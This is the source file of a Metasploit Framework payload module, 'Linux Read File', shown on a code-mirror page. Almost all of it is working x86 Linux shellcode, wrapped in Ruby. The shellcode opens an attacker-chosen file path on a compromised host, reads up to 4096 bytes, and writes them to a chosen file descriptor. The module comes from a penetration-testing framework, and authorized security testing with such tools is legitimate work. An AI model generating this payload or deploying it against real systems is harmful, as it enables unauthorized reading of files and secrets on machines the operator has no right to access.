Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/x86/read_file.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 63

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Linux::X86::Prepends

11


12
  def initialize(info = {})

13
    super(

14
      merge_info(

15
        info,

16
        'Name' => 'Linux Read File',

17
        'Version' => '',

18
        'Description' => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor',

19
        'Author' => 'hal',

20
        'License' => MSF_LICENSE,

21
        'Platform' => 'linux',

22
        'Arch' => ARCH_X86

23
      )

24
    )

25


26
    # Register exec options

27
    register_options(

28
      [

29
        OptString.new('PATH', [ true, 'The file path to read' ]),

30
        OptString.new('FD', [ true, 'The file descriptor to write output to', 1 ]),

31
      ]

32
    )

33
  end

34


35
  def generate(_opts = {})

36
    fd = datastore['FD']

37


38
    payload_data = <<-EOS

39
      jmp file

40


41
      open:

42
        mov eax,0x5       ; open() syscall

43
        pop ebx           ; Holds the filename

44
        xor ecx,ecx       ; Open for reading (0)

45
        int 0x80

46


47
      read:

48
        mov ebx,eax       ; Store the open fd

49
        mov eax,0x3       ; read() syscall

50
        mov edi,esp       ; We're just going to save on the stack

51
        mov ecx,edi       ; Save at edi

52
        mov edx,0x1000    ; Read as much as we can

53
        int 0x80

54


55
      write:

56
        mov edx,eax       ; Number of bytes to write

57
        mov eax,0x4       ; write() system call

58
        mov ebx,#{fd}     ; fd to write to

59
        int 0x80

60


61
      exit:

62
        mov eax,0x1       ; exit() system call

63
        mov ebx,0x0       ; return 0

64
        int 0x80

65


66
      file:

67
        call open

68
        db "#{datastore['PATH']}", 0x00

69
    EOS

70


71
    Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string

72
  end

73
end

74


75